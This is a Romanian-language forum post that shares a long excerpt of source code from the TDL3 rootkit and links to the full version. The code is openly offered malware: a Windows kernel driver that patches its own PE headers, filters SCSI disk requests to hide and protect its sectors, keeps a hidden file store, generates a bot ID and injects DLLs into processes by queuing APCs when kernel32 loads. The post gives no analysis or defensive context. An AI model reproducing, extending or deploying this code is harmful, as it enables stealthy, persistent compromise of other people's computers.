Jump to content
Nytro

TDL3 1000+ SC lines

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

TDL3 1000+ SC lines

Bucati din codul sursa de la cunoscutul TDL3:

#include "inc.h"

#pragma comment(linker,"/subsystem:native /entry:DriverEntry")

NT_BEGIN
EXTERN_C_START

DWORD GetDelta();
NTSTATUS Reinitialize(PDEVICE_OBJECT,BOOLEAN);
VOID GetEPNameOffset();

NTSTATUS TDLEntry(PDRIVER_OBJECT pdoDriver,PUNICODE_STRING pusRegistry)
{

    PTDL_START ptsStart;
    PIMAGE_NT_HEADERS pinhHeader;

    GET_TDL_ADDRESSES->pdoDeviceDisk=(PDEVICE_OBJECT)pusRegistry;
    pinhHeader=(PIMAGE_NT_HEADERS)RtlImageNtHeader(pdoDriver->DriverStart);
     ptsStart=(PTDL_START)RtlOffsetToPointer(pdoDriver->DriverStart,pinhHeader->OptionalHeader.AddressOfEntryPoint+TDL_START_SIZE-sizeof(TDL_START));
    GET_TDL_ADDRESSES->ullFSOffset=ptsStart->ullDriverCodeOffset;
    pinhHeader->OptionalHeader.AddressOfEntryPoint=(DWORD)(DWORD_PTR)ptsStart->pdiOEP;
    pinhHeader->OptionalHeader.CheckSum=ptsStart->dwCheckSum;
    pinhHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].Size=ptsStart->dwSectionSecuritySize;
     pinhHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress=ptsStart->dwSectionSecurityVirtualAddress;
    GetEPNameOffset();
    *GET_TDL_ADDRESSES->cBotID=0;
    if(!NT_SUCCESS(Reinitialize(0,FALSE)))
    {
        IoRegisterFsRegistrationChange(GET_TDL_ADDRESSES->pdoDriver,ADDRESS_DELTA(PDRIVER_FS_NOTIFICATION,Reinitialize));
    }
    return STATUS_SUCCESS;
}

VOID GetEPNameOffset()
{
    CHAR cSystem[]={'S','y','s','t','e','m',0};

    GET_TDL_ADDRESSES->dwEPNameOffset=0;
    while(memcmp(RtlOffsetToPointer(IoGetCurrentProcess(),GET_TDL_ADDRESSES->dwEPNameOffset),cSystem,sizeof(cSystem))!=0)
    {
        GET_TDL_ADDRESSES->dwEPNameOffset++;
    }
    return;
}

PVOID Unxor(PVOID pvData,DWORD dwSize,BYTE bKey)
{
    DWORD dwData;

    for(dwData=0;dwData<dwSize;dwData++)
    {
        ((PBYTE)pvData)[dwData]^=dwData+bKey;
    }
    return pvData;
};

NTSTATUS SCSICmd(PDEVICE_OBJECT pdoDevice,PDRIVER_DISPATCH  pddDispatch,BYTE bOpCode,BYTE bDataIn,PVOID pvBuffer,DWORD  dwBufferSize,DWORD dwAddress)
{
    SCSI_REQUEST_BLOCK srbBuffer;
    SENSE_DATA sdData;
    IO_STATUS_BLOCK iosbStatus;
    KEVENT keEvent;
    PIRP piIrp;
    PMDL pmMdl;
    PIO_STACK_LOCATION pislStack;

    memset(&srbBuffer,0,sizeof(srbBuffer));
    memset(&sdData,0,sizeof(sdData));
    srbBuffer.Length=sizeof(srbBuffer);
    srbBuffer.Function=SRB_FUNCTION_EXECUTE_SCSI;
    srbBuffer.QueueAction=SRB_FLAGS_DISABLE_AUTOSENSE;
    srbBuffer.CdbLength=CDB10GENERIC_LENGTH;
    srbBuffer.SenseInfoBufferLength=sizeof(sdData);
    srbBuffer.SenseInfoBuffer=&sdData;
    srbBuffer.DataTransferLength=dwBufferSize;
    srbBuffer.DataBuffer=pvBuffer;
    srbBuffer.TimeOutValue=5000;
    srbBuffer.QueueSortKey=dwAddress;
    srbBuffer.SrbFlags=bDataIn|SRB_FLAGS_DISABLE_AUTOSENSE;
    srbBuffer.Cdb[0]=bOpCode;
    srbBuffer.Cdb[2]=(BYTE)((dwAddress&0xff000000)>>24); 
    srbBuffer.Cdb[3]=(BYTE)((dwAddress&0xff0000)>>16); 
    srbBuffer.Cdb[4]=(BYTE)((dwAddress&0xff00)>>8); 
    srbBuffer.Cdb[5]=(BYTE)(dwAddress&0xff);
    if(dwAddress!=0)
    {
        DWORD dwSectors;

        dwSectors=dwBufferSize/0x200;
        srbBuffer.Cdb[7]=(BYTE)((dwSectors&0xff00)>>8);
        srbBuffer.Cdb[8]=(BYTE)(dwSectors&0xff);
    }
    KeInitializeEvent(&keEvent,NotificationEvent,FALSE);
    piIrp=IoAllocateIrp(pdoDevice->StackSize,FALSE);
    if(piIrp!=0)
    {
        pmMdl=IoAllocateMdl(pvBuffer,dwBufferSize,0,0,piIrp);
        srbBuffer.OriginalRequest=piIrp;
        piIrp->MdlAddress=pmMdl;
        MmProbeAndLockPages(pmMdl,KernelMode,IoModifyAccess);
        piIrp->UserIosb=&iosbStatus;
        piIrp->UserEvent=&keEvent;
        piIrp->Flags=IRP_SYNCHRONOUS_API|IRP_NOCACHE;
        piIrp->Tail.Overlay.Thread=KeGetCurrentThread();
        pislStack=IoGetNextIrpStackLocation(piIrp);
        pislStack->DeviceObject=pdoDevice;
        pislStack->MajorFunction=IRP_MJ_SCSI;
        pislStack->Parameters.Scsi.Srb=&srbBuffer;
        piIrp->CurrentLocation--;
        pislStack=IoGetNextIrpStackLocation(piIrp);
        piIrp->Tail.Overlay.CurrentStackLocation=pislStack;
        pislStack->DeviceObject=pdoDevice;
        if(pddDispatch(pdoDevice,piIrp)==STATUS_PENDING)
        {
            KeWaitForSingleObject(&keEvent,Executive,KernelMode,FALSE,0);
        }
        return iosbStatus.Status;
    }
    return STATUS_INSUFFICIENT_RESOURCES;
}

extern "C"
{
    #include "gz.cpp"
    #include "md4.cpp"
    #include "socket.cpp"
    #include "tdlini.cpp"
    #include "tdlfs.cpp"

}

NTSTATUS MJCompletion(PDEVICE_OBJECT pdoDevice,PIRP piIrp,PVOID pvContext)
{
    NTSTATUS ntsStatus;

    if(NT_SUCCESS(piIrp->IoStatus.Status))
    {
        PVOID pvBuffer;
        PIO_STACK_LOCATION pislStack;
        DWORD dwSector;

        pislStack=IoGetCurrentIrpStackLocation(piIrp);
        pvBuffer=MmGetSystemAddressForMdlSafe(piIrp->MdlAddress,NormalPagePriority);
         if(((PDISK_COMPLETION)pvContext)->dwSectorOffset+(DWORD)piIrp->IoStatus.Information/GET_TDL_ADDRESSES->dwSectorSize>GET_TDL_ADDRESSES->dwFirstHiddenSector)
        {
            DWORD dwOffset;

            if(((PDISK_COMPLETION)pvContext)->dwSectorOffset<GET_TDL_ADDRESSES->dwFirstHiddenSector)
            {
                 dwOffset=(GET_TDL_ADDRESSES->dwFirstHiddenSector-((PDISK_COMPLETION)pvContext)->dwSectorOffset)*GET_TDL_ADDRESSES->dwSectorSize;
            }
            else
            {
                dwOffset=0;
            }
            memset(RtlOffsetToPointer(pvBuffer,dwOffset),0,(DWORD)piIrp->IoStatus.Information-dwOffset);
        }
        else
        {
            for(dwSector=0;dwSector<GET_TDL_ADDRESSES->dwHiddenSectors;dwSector++)
            {
                if((GET_TDL_ADDRESSES->thsSectors[dwSector].dwSectorOffset!=0)
                     &&ADDRESS_IN(GET_TDL_ADDRESSES->thsSectors[dwSector].dwSectorOffset,((PDISK_COMPLETION)pvContext)->dwSectorOffset,piIrp->IoStatus.Information/GET_TDL_ADDRESSES->dwSectorSize))
                {
                     memcpy(RtlOffsetToPointer(pvBuffer,GET_TDL_ADDRESSES->thsSectors[dwSector].dwOffset+(GET_TDL_ADDRESSES->thsSectors[dwSector].dwSectorOffset-((PDISK_COMPLETION)pvContext)->dwSectorOffset)*GET_TDL_ADDRESSES->dwSectorSize),GET_TDL_ADDRESSES->thsSectors[dwSector].pvValue,GET_TDL_ADDRESSES->thsSectors[dwSector].dwSize);
                }
            }
        }
    }
    if(((PDISK_COMPLETION)pvContext)->picrCompletion!=0)
    {
        ntsStatus=((PDISK_COMPLETION)pvContext)->picrCompletion(pdoDevice,piIrp,((PDISK_COMPLETION)pvContext)->pvContext);
    }
    ExFreePool(pvContext);
    return ntsStatus;
}

NTSTATUS MJDispatch(PDEVICE_OBJECT pdoDevice,PIRP piIrp)
{
    PIO_STACK_LOCATION pislStack;
    PDISK_COMPLETION pdcCompletion=0;
    DWORD dwSector;

    pislStack=IoGetCurrentIrpStackLocation(piIrp);
    if((pdoDevice==GET_TDL_ADDRESSES->pdoFSDevice)
        &&(pislStack->FileObject!=0)
         &&(pislStack->FileObject->FileName.Length>sizeof(GET_TDL_ADDRESSES->wcTDLDirectory)+2*sizeof(L'\\')-sizeof(WCHAR))
         &&(memcmp(RtlOffsetToPointer(pislStack->FileObject->FileName.Buffer,sizeof(L'\\')),GET_TDL_ADDRESSES->wcTDLDirectory,sizeof(GET_TDL_ADDRESSES->wcTDLDirectory)-sizeof(WCHAR))==0))
    {
        piIrp->IoStatus.Status=STATUS_NOT_IMPLEMENTED;
        piIrp->IoStatus.Information=0;
        TDLFSDispatch(pdoDevice,piIrp);
        IoCompleteRequest(piIrp,IO_NO_INCREMENT);
        return piIrp->IoStatus.Status;
    }
    if((pdoDevice==GET_TDL_ADDRESSES->pdoDeviceDisk)
        &&(!((pislStack->FileObject!=0)
             &&(pislStack->FileObject->FileName.Length==sizeof(L'\\')+sizeof(GET_TDL_ADDRESSES->wcTDLDirectory)-sizeof(WCHAR))
             &&(memcmp(RtlOffsetToPointer(pislStack->FileObject->FileName.Buffer,sizeof(L'\\')),GET_TDL_ADDRESSES->wcTDLDirectory,sizeof(GET_TDL_ADDRESSES->wcTDLDirectory)-sizeof(WCHAR))==0)))
        &&(pislStack->MajorFunction==IRP_MJ_SCSI)
        &&(pislStack->Parameters.Scsi.Srb->Function==SRB_FUNCTION_EXECUTE_SCSI))
    {
        BOOL bComplete=FALSE;
        BOOL bEnd=FALSE;

         if(pislStack->Parameters.Scsi.Srb->QueueSortKey+pislStack->Parameters.Scsi.Srb->DataTransferLength/GET_TDL_ADDRESSES->dwSectorSize>GET_TDL_ADDRESSES->dwFirstHiddenSector)
        {
            bEnd=(pislStack->Parameters.Scsi.Srb->SrbFlags&SRB_FLAGS_DATA_OUT)!=0;
            bComplete=(pislStack->Parameters.Scsi.Srb->SrbFlags&SRB_FLAGS_DATA_IN)!=0;
        }
        else
        {
            for(dwSector=0;dwSector<GET_TDL_ADDRESSES->dwHiddenSectors;dwSector++)
            {
                if((GET_TDL_ADDRESSES->thsSectors[dwSector].dwSectorOffset!=0)
                     &&ADDRESS_IN(GET_TDL_ADDRESSES->thsSectors[dwSector].dwSectorOffset,pislStack->Parameters.Scsi.Srb->QueueSortKey,pislStack->Parameters.Scsi.Srb->DataTransferLength/GET_TDL_ADDRESSES->dwSectorSize))
                {
                    bEnd=(pislStack->Parameters.Scsi.Srb->SrbFlags&SRB_FLAGS_DATA_OUT)!=0;
                    bComplete=(pislStack->Parameters.Scsi.Srb->SrbFlags&SRB_FLAGS_DATA_IN)!=0;
                }
            }
        }
        if(bEnd)
        {
            pislStack->Parameters.Scsi.Srb->SrbStatus=SRB_STATUS_SUCCESS;
            pislStack->Parameters.Scsi.Srb->InternalStatus=SRB_STATUS_SUCCESS;
            piIrp->IoStatus.Status=STATUS_SUCCESS;
            IoCompleteRequest(piIrp,IO_NO_INCREMENT);
            return STATUS_SUCCESS;
        }
        if(bComplete)
        {
            pdcCompletion=(PDISK_COMPLETION)ExAllocatePool(NonPagedPool,sizeof(DISK_COMPLETION));
            if(pdcCompletion!=0)
            {
                pdcCompletion->picrCompletion=pislStack->CompletionRoutine;
                pdcCompletion->pvContext=pislStack->Context;
                pdcCompletion->dwSectorOffset=pislStack->Parameters.Scsi.Srb->QueueSortKey;
                pislStack->Control=SL_INVOKE_ON_SUCCESS|SL_INVOKE_ON_ERROR|SL_INVOKE_ON_CANCEL;
                pislStack->Context=pdcCompletion;
                pislStack->CompletionRoutine=ADDRESS_DELTA(PIO_COMPLETION_ROUTINE,MJCompletion);
            }
        }
    }
    return GET_TDL_ADDRESSES->pddDiskMJ[pislStack->MajorFunction](pdoDevice,piIrp);
}

NTSTATUS GenerateBotID(PCHAR pcBotID,DWORD dwBotIDSize)
{
    CHAR cBotIDFormat[]={'%','x','%','x',0};
    WCHAR wcVolumeObject[]={L'\\',L's',L'y',L's',L't',L'e',L'm',L'r',L'o',L'o',L't',0};
    UUID uuidBotID;
    UNICODE_STRING usName;
    HANDLE hVolume;
    FILE_FS_VOLUME_INFORMATION ffviInfo;
    IO_STATUS_BLOCK iosbStatus;
    OBJECT_ATTRIBUTES oaAttributes;

    RtlInitUnicodeString(&usName,wcVolumeObject);
    InitializeObjectAttributes(&oaAttributes,&usName,OBJ_CASE_INSENSITIVE|OBJ_KERNEL_HANDLE,0,0);
    ffviInfo.VolumeSerialNumber=0;
     if(NT_SUCCESS(ZwOpenFile(&hVolume,SYNCHRONIZE,&oaAttributes,&iosbStatus,FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE,FILE_SYNCHRONOUS_IO_NONALERT)))
    {
        ZwQueryVolumeInformationFile(hVolume,&iosbStatus,&ffviInfo,sizeof(ffviInfo),FileFsVolumeInformation);
        ZwClose(hVolume);
    }
    if(ExUuidCreate(&uuidBotID)==0)
    {
        _snprintf(pcBotID,dwBotIDSize,cBotIDFormat,*(PDWORD)RtlOffsetToPointer(uuidBotID.Data4,4),ffviInfo.VolumeSerialNumber);
        return STATUS_SUCCESS;
    }    
    return STATUS_RETRY;
}

__declspec(naked) DWORD GetDelta()
{
    __asm
    {
        call delta
        delta:
        pop    eax
        sub    eax,offset delta
        retn
    }
}

__declspec(noinline) PVOID GetNtoskrnlBase()
{
    BYTE bIDT[6];
    PIDT_ENTRY pieIDTEntry;
    PWORD pwAddress;

    __asm
    {
        sidt bIDT;
    }
    pieIDTEntry=(PIDT_ENTRY)(*((PDWORD_PTR)&bIDT[2])+8*0x40);
    pwAddress=PWORD(pieIDTEntry->dw64OffsetLow|(pieIDTEntry->dw64OffsetHigh<<16));
    do
    {
        pwAddress=(PWORD)ALIGNDOWN(pwAddress,PAGE_SIZE);
        if(*pwAddress=='ZM')
        {
            return (PVOID)pwAddress;
        }
        pwAddress--;
    }
    while(pwAddress!=0);
    return 0;
}

VOID __stdcall APCKernelRoutine(PKAPC pkaApc,PKNORMAL_ROUTINE*,PVOID*,PVOID* ppvMemory,PVOID*)
{
    ExFreePool(pkaApc);
    return;
}

NTSTATUS DllInject(HANDLE hProcessID,PEPROCESS pepProcess,PKTHREAD pktThread,PCHAR pcDll,BOOLEAN bAlert)
{
    HANDLE hProcess;
    OBJECT_ATTRIBUTES oaAttributes={sizeof(OBJECT_ATTRIBUTES)};
    CLIENT_ID cidProcess;
    PVOID pvMemory=0;
    DWORD dwSize;
    CHAR cDllReal[MAX_PATH];
    CHAR cDllRealFormat[]={'\\','\\','?','\\','g','l','o','b','a','l','r','o','o','t','%','S','\\','%','S','\\','%','s',0};
    PCHAR pcDllReal;

    if(*pcDll!='\\')
    {
         dwSize=_snprintf(cDllReal,RTL_NUMBER_OF(cDllReal)-1,cDllRealFormat,GET_TDL_ADDRESSES->wcFSDevice,GET_TDL_ADDRESSES->wcTDLDirectory,pcDll)+1;
        pcDllReal=cDllReal;
    }
    else
    {
        pcDllReal=pcDll;
        dwSize=strlen(pcDll)+1;
    }
    cidProcess.UniqueProcess=hProcessID;
    cidProcess.UniqueThread=0;
    if(NT_SUCCESS(ZwOpenProcess(&hProcess,PROCESS_ALL_ACCESS,&oaAttributes,&cidProcess)))
    {
        if(NT_SUCCESS(ZwAllocateVirtualMemory(hProcess,&pvMemory,0,&dwSize,MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE)))
        {
            KAPC_STATE kasState;
            PKAPC pkaApc;

            KeStackAttachProcess(pepProcess,&kasState);
            strcpy(pvMemory,pcDllReal);
            KeUnstackDetachProcess(&kasState);
            pkaApc=(PKAPC)ExAllocatePool(NonPagedPool,sizeof(KAPC));
            if(pkaApc!=0)
            {
                 KeInitializeApc(pkaApc,pktThread,0,ADDRESS_DELTA(PKKERNEL_ROUTINE,APCKernelRoutine),0,GET_TDL_ADDRESSES->pvLoadLibraryExA,UserMode,pvMemory);
                KeInsertQueueApc(pkaApc,0,0,IO_NO_INCREMENT);
                return STATUS_SUCCESS;
            }
        }
        ZwClose(hProcess);
    }
    return STATUS_NO_MEMORY;
}

VOID WIInjector(PVOID pvContext)
{
    CHAR cAny[]=TDL_CONFIG_INJECTOR_ANY;
    CHAR cSection[]=TDL_CONFIG_INJECTOR;
    CHAR cDll[MAX_PATH];


    CHAR cSection2[]=TDL_CONFIG_MAIN;
    CHAR cKey[]={'d','a','t','e',0};


    DWORD dwDate=TDLIniReadDword(GET_TDL_ADDRESSES->wcTDLConfig,cSection2,cKey,0);
    DWORD dwCurrent;

    LARGE_INTEGER liTime;
    KeQuerySystemTime(&liTime);
    RtlTimeToSecondsSince1970(&liTime,&dwCurrent);

    //CHAR cDebug[]={'D','A','T','E','%','d',' ','%','d',' ','%','d',' ','%','d','\n',0};
    //DbgPrint(cDebug,dwDate,dwCurrent,dwCurrent-dwDate,0);


    //if(dwCurrent-dwDate>=60*24*60)
    {
//        DbgPrint(cDebug,dwDate,dwCurrent,dwCurrent-dwDate,1);
        if(TDLIniReadString(GET_TDL_ADDRESSES->wcTDLConfig,cSection,cAny,0,cDll,sizeof(cDll)))
        {
             DllInject(((PWI_INJECT)pvContext)->hProcessID,((PWI_INJECT)pvContext)->pepProcess,((PWI_INJECT)pvContext)->pktThread,cDll,FALSE);
        }
         if(TDLIniReadString(GET_TDL_ADDRESSES->wcTDLConfig,cSection,RtlOffsetToPointer(((PWI_INJECT)pvContext)->pepProcess,GET_TDL_ADDRESSES->dwEPNameOffset),0,cDll,sizeof(cDll)))
        {
             DllInject(((PWI_INJECT)pvContext)->hProcessID,((PWI_INJECT)pvContext)->pepProcess,((PWI_INJECT)pvContext)->pktThread,cDll,FALSE);
        }
    }

    KeSetEvent(&((PWI_INJECT)pvContext)->keEvent,(KPRIORITY)0,FALSE);
    return;
}

VOID __stdcall APCInjectRoutine(PKAPC pkaApc,PKNORMAL_ROUTINE*,PVOID*,PVOID*,PVOID*)
{
    WI_INJECT wiiItem;

    ExFreePool(pkaApc);
    wiiItem.pktThread=KeGetCurrentThread();
    wiiItem.pepProcess=IoGetCurrentProcess();
    wiiItem.hProcessID=PsGetCurrentProcessId();
    KeInitializeEvent(&wiiItem.keEvent,NotificationEvent,FALSE);
    ExInitializeWorkItem(&wiiItem.qiItem,ADDRESS_DELTA(PWORKER_THREAD_ROUTINE,WIInjector),&wiiItem);
    ExQueueWorkItem(&wiiItem.qiItem,DelayedWorkQueue);
    KeWaitForSingleObject(&wiiItem.keEvent,Executive,KernelMode,TRUE,0);
    return;
}

VOID LoadImageNotify(PUNICODE_STRING FullImageName,HANDLE hProcessID,PIMAGE_INFO ImageInfo)
{
    if(FullImageName!=0)
    {
        WCHAR wcKernel32Mask[]={L'*',L'\\',L'K',L'E',L'R',L'N',L'E',L'L',L'3',L'2',L'.',L'D',L'L',L'L',0};
        UNICODE_STRING usKernel32Mask;

        RtlInitUnicodeString(&usKernel32Mask,wcKernel32Mask);
        if(FsRtlIsNameInExpression(&usKernel32Mask,FullImageName,TRUE,0))
        {
            PKAPC pkaApc;

            if(GET_TDL_ADDRESSES->pvLoadLibraryExA==0)
            {
                 GET_TDL_ADDRESSES->pvLoadLibraryExA=GetProcedureAddressByHash(ImageInfo->ImageBase,TDL_HASH_LOADLIBRARYEXA);
            }
            pkaApc=(PKAPC)ExAllocatePool(NonPagedPool,sizeof(KAPC));
            if(pkaApc!=0)
            {
                 KeInitializeApc(pkaApc,KeGetCurrentThread(),0,ADDRESS_DELTA(PKKERNEL_ROUTINE,APCInjectRoutine),0,0,KernelMode,0);
                KeInsertQueueApc(pkaApc,0,0,IO_NO_INCREMENT);
            }
        }
    }
    return;
}

VOID WIKnock(PVOID pvWIKnock)
{
    KEVENT keEvent;

    ExFreePool(pvWIKnock);

    /*
    CHAR cSection2[]=TDL_CONFIG_MAIN;
        CHAR cKey[]={'r','e','b','o','o','t','s',0};
        CHAR cDebug[]={'U','P','D','%','s',' ','%','d','\n',0};
        DWORD dwRand=(DWORD)rand()%100;
        DbgPrint(cDebug,cKey,dwRand);
        TDLIniWriteDword(GET_TDL_ADDRESSES->wcTDLConfig,cSection2,cKey,dwRand);
    */

    KeInitializeEvent(&keEvent,NotificationEvent,FALSE);
    while(TRUE)
    {

        LARGE_INTEGER liDelay;


        if((*GET_TDL_ADDRESSES->cBotID==0)
            &&NT_SUCCESS(GenerateBotID(GET_TDL_ADDRESSES->cBotID,RTL_NUMBER_OF(GET_TDL_ADDRESSES->cBotID))))
        {
            OBJECT_ATTRIBUTES oaAttributes;
            WCHAR wcBotID[0x10+sizeof(L'\\')+1];
            WCHAR wcBotIDFormat[]={L'\\',L'%',L'S',0};
            UNICODE_STRING usName;
            HANDLE hEvent;

            _snwprintf(wcBotID,RTL_NUMBER_OF(wcBotID),wcBotIDFormat,GET_TDL_ADDRESSES->cBotID);
            RtlInitUnicodeString(&usName,wcBotID);
            InitializeObjectAttributes(&oaAttributes,&usName,OBJ_CASE_INSENSITIVE|OBJ_KERNEL_HANDLE,0,0);
            ZwCreateEvent(&hEvent,EVENT_ALL_ACCESS,&oaAttributes,NotificationEvent,TRUE);
            return;
        }
        liDelay.QuadPart=(LONGLONG)-10*10000000;

        //liDelay.QuadPart=(LONGLONG)-1*10000000;
        KeWaitForSingleObject(&keEvent,Executive,KernelMode,FALSE,&liDelay);
    }
    return;
}
/*

void WITimer(PVOID pvWITimer)
{
    CHAR cSection2[]=TDL_CONFIG_MAIN;
    CHAR cKey[]={'r','e','b','o','o','t','s',0};
    CHAR cDebug[]={'U','P','D','%','s',' ','%','d','\n',0};
    KEVENT keEvent;

    ExFreePool(pvWITimer);
    KeInitializeEvent(&keEvent,NotificationEvent,FALSE);

    while(TRUE)
    {
        DWORD dwRand=(DWORD)rand()%100;
        LARGE_INTEGER liDelay;

        DbgPrint(cDebug,cKey,dwRand);
        //TDLIniWriteDword(GET_TDL_ADDRESSES->wcTDLConfig,cSection2,cKey,dwRand);

        liDelay.QuadPart=(LONGLONG)-5*10000000;
        KeWaitForSingleObject(&keEvent,Executive,KernelMode,FALSE,&liDelay);
    }

}
*/

PIMAGE_SECTION_HEADER RvaToSectionHeader(PIMAGE_NT_HEADERS pinhHeader,DWORD dwRva)
{
    PIMAGE_SECTION_HEADER pishHeader;
    DWORD dwSection;

    pishHeader=IMAGE_FIRST_SECTION(pinhHeader);
    for(dwSection=0;dwSection<pinhHeader->FileHeader.NumberOfSections;dwSection++)
    {
        if((dwRva>=pishHeader->VirtualAddress)
            &&(dwRva<(pishHeader->VirtualAddress+pishHeader->Misc.VirtualSize)))
        {
            return pishHeader;
        }
        pishHeader++;
    }
    return 0;
}

DWORD RvaToFileOffset(PIMAGE_NT_HEADERS pinhHeader,DWORD dwRva)
{
    PIMAGE_SECTION_HEADER pishHeader;

    pishHeader=RvaToSectionHeader(pinhHeader,dwRva);
    if(pishHeader!=0)
    {
        return  (DWORD)ALIGNDOWN(pishHeader->PointerToRawData,pinhHeader->OptionalHeader.FileAlignment)+(dwRva-pishHeader->VirtualAddress);
    }
    return 0;
}

Complet:

http://pastebin.com/UpvGUw19

Sursa: Some TDL3 C++ Source code 1000+ lines

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...